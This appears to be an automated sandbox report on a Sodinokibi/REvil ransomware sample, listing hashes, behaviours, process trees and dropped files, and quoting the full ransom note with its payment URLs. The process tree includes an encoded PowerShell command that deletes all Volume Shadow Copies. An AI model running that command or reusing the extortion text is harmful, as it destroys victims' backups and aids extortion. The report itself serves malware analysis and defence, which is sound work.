Analysis

  • max time kernel
    143s
  • max time network
    147s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    24-08-2024 18:39

General

  • Target

    bf31b07ed28a86bd34223675a8496fdb_JaffaCakes118.exe

  • Size

    164KB

  • MD5

    bf31b07ed28a86bd34223675a8496fdb

  • SHA1

    ba660ebd94e582847e8b13320214c0ffd0811d1c

  • SHA256

    27adf17658a15e80b80a56b94edcaad7c8397ddcb59e57e9751b5feffc39bc50

  • SHA512

    97777ccf1a9b6f9952163afffb07eca233a6e074e02cb3f25bcc18fe5ef3a60f3b15ede43d216adea2f7a5bc0607cde244525c6770b99e32d9e10ea4745707c2

  • SSDEEP

    3072:xdHwJK3BMoFiWjmfb+HP+rnRfUVJ2vK829ZI/S:xNwE3q4jmfCHWtUv9y/

Malware Config

Extracted

Path

C:\Users\xn8ewp022-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion xn8ewp022. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F534006903042994 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.top/F534006903042994 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Ezj6x8H7ahhhWFmsZOQVGgaoX9CkgzYn7IaJ5oQ884nrD2PSXZl9A3ZZ/u1ci5yQ OOfNcK4+7Ps6V6bZaH7VVTxNB+bLQvU4Fk2NIcPC2QtBuSszyPRD56WDM+BClXnz N1dbDFaCo1QJjujnDBaKflWkdZ/of6+O10OyHk9xobJ3++ZkBd8vk3vjWgMU9Qnx yRk9rsgvTQWvYnKpUg8rWZKdPpzoBL0ysllqULRfrBhAXbxAMImCK+6uAIdrI4hU OaqDKvmPQ8OgT2cP4yVV2xVjEGfzDm+Cw4DV7AR0R0Fuy0VWUL908NRxMzPVh2M0 cj/xd9Qp1DulQxcY1AAad5t/iiQimdPf2d5JehiMuMENjVP5+A0kBokBFH2btLf8 t7dMQpl7zDQGHouMV6d+65G0O+6VT6qEkrMrTa4MQbNCptwd05Hhh5usv0MLC3+L uGaOyj3de1u7I3AWbX3l7SK1EuRazKbkareUHvzr/V/7CQTVlzJjpShxJwoD92rp F7EhpiL4JaYsdjbPcR+f4ztx0rNIZxg8WkzLe7VoQVnsurTGQkfOqKgIPfdq0T8W i0CpvStCpIO+fn0kxTSTOqH1h9symPqHoQ22fRXcoQRJ2qShBCU2GgchFouZDa8v UBuq1IlT7nHuymJPRNQVs9mIS19gMK/1upG+NC3WJztWHlfwM7VN5WbKcJwYhGAa ip6LWeP6ndSZotNyLfDROfASt+9whVJIKvHHRD9O4A2iq1wjjbXAQ8fHZoq+XfZ3 HMQZWHxIp+g+3Bml6gSVMYNGjhnYNsC/RMKh9CRibId22pjNlMD6P80PNLhAf1oq kY8WCC/OxinIxvgzVD//7AHtBFkxKH64AnTc1D4TCfuQIVHn1Vq6rBplxLqqIsHe x2YN3KZObTjB4d1Vqif2y05qMduvOsqaciIzVRPoo++VZ3RBKW0pso3zc0CE7kPs 1Pn5LiR1Zo0QCZTuZc5psK29TVYFt+imr2IFio5BaAqPuRrSL/JsUPy63MaEHQ8R I4jAipDnYsIciaBNUtFJQEfS2Bc+905z2dVSJmU0Js3nP2eJqOCrRrtPStkAJ6Jl Npv4WlSbRLwoiOKqnyNIxa+Wr5LzlgvvbkoDC1v/Oyz28hsohMZn3cf38F+Kb9/p ROe8qhTCOuyDjE8XdNK/Uvffhyh2quoOAcOysKI+ssRp+xS1o/oeCdFf0zMFd2o3 qplGZmxZjPbQGFyWfnk= Extension name: xn8ewp022 ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/F534006903042994

http://decryptor.top/F534006903042994

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 27 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\bf31b07ed28a86bd34223675a8496fdb_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\bf31b07ed28a86bd34223675a8496fdb_JaffaCakes118.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:496
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2204
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2316
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2876

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\xn8ewp022-readme.txt

      Filesize

      6KB

      MD5

      3c6bc80fb3bf4f68eed378695592b124

      SHA1

      9c3ad22d40283ce422da7e985c01aaebe507d783

      SHA256

      187b016cc30a98f9a3871359997dfcce8464fda80a17a9a37a8a08c0399b6649

      SHA512

      fd027ba2493c84ba741970c94e9cb2f28da0b88ca6566c7d83b0567d0787d052a410556da87f8a574e9438cca77ef94c06ff97b7179f5d764187a29a684e0692

    • memory/2204-4-0x000007FEF686E000-0x000007FEF686F000-memory.dmp

      Filesize

      4KB

    • memory/2204-5-0x000000001B700000-0x000000001B9E2000-memory.dmp

      Filesize

      2.9MB

    • memory/2204-6-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

      Filesize

      32KB

    • memory/2204-10-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2204-9-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2204-8-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2204-7-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2204-11-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2204-12-0x000007FEF65B0000-0x000007FEF6F4D000-memory.dmp

      Filesize

      9.6MB